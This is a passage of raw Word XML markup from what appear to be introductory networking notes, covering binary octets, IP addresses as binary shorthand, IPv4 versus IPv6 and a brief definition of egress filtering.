          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="B0B8BF"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="113" w:type="dxa"/>
              <w:left w:w="113" w:type="dxa"/>
              <w:bottom w:w="113" w:type="dxa"/>
              <w:right w:w="113" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F643F9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="2F353A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Essentially, zeros mean off and ones mean on. So the above has a value of 240 because 128+64+32+16=240. If you wanted to make a value of one, it would be 00000001. If you wanted a value of three, it would be 00000011. You're turning the values on or off with a one or a zero to make a value, like an abacus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remember that we said each block of an IP address is a value between zero and 255? Remember that we also said each block was an octet? Well that means that 192.168.0.1, in binary, looks like 11000000.10101000.00000000.00000001. A bit unwieldy, huh? So instead of writing 32 separate numbers, we write shorthand. That’s what an IP is – binary shorthand.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRPr="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="00713ECD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv4 vs. IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRPr="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="00713ECD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv4 is the version of Internet Protocol that is mos</w:t>
      </w:r>
      <w:r w:rsidR="00FC5524">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t widely used around the world.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRPr="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="00713ECD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>However, a version known as IPv6 is primed t</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">o take over and improve network </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>addressing and routing. IPv4 uses a 32-bit address</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ing scheme, while IPv6 uses 128 </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bits for addressing. IPv6 offers many new features that are not available in IPv4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRPr="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="00713ECD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Some of IPv6’s new features are scoped addresses, au</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">toconfiguration, and Quality of </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Service (QoS) priority values. Scoped addresses giv</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e administrators the ability to </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>group and then block or allow access to network se</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rvices, such as file servers or </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">printing. Autoconfiguration removes the need for </w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">both DHCP and NAT. QoS priority </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>values allow for traffic management based on prioritized content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="00713ECD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv6 is supported by most operating systems released</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> since 2000, either natively or </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>via an add-in. However, IPv6 has been slowly adopted</w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Most of the IPv6 networks are </w:t>
      </w:r>
      <w:r w:rsidRPr="00713ECD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">currently located in private networks such as those </w:t>
      </w:r>
      <w:r w:rsidR="00532178">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in large corporations, research laboratories, and universities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004051C8" w:rsidRDefault="004051C8" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004051C8" w:rsidRDefault="004051C8" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004051C8" w:rsidRDefault="004051C8" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004051C8" w:rsidRDefault="004051C8" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004051C8" w:rsidRDefault="004051C8" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004051C8" w:rsidRDefault="004051C8" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00713ECD" w:rsidRDefault="00713ECD" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F11AD" w:rsidRPr="00173DF3" w:rsidRDefault="002F11AD" w:rsidP="002F11AD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Egress Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F11AD" w:rsidRPr="00173DF3" w:rsidRDefault="002F11AD" w:rsidP="002F11AD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Egress filtering is the practice of monitoring and potentially restricting th</w:t>
      </w:r>
      <w:r w:rsidR="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e flow of </w:t>
      </w:r>
      <w:r w:rsidRPr="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information outbound from one network to another. Typica</w:t>
      </w:r>
      <w:r w:rsidR="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lly, it is the information flow </w:t>
      </w:r>
      <w:r w:rsidRPr="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>from a private computer network to the Internet that is being monitored and controlled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="002F11AD" w:rsidP="00173DF3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP/IP packets that are being sent out of the internal network are exa</w:t>
      </w:r>
      <w:r w:rsidR="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mined via a router, </w:t>
      </w:r>
      <w:r w:rsidRPr="00173DF3">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firewall, or similar edge device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36AA8" w:rsidRDefault="00A36AA8" w:rsidP="00173DF3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A36AA8" w:rsidRPr="00F71E90" w:rsidRDefault="00A36AA8" w:rsidP="00A36AA8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
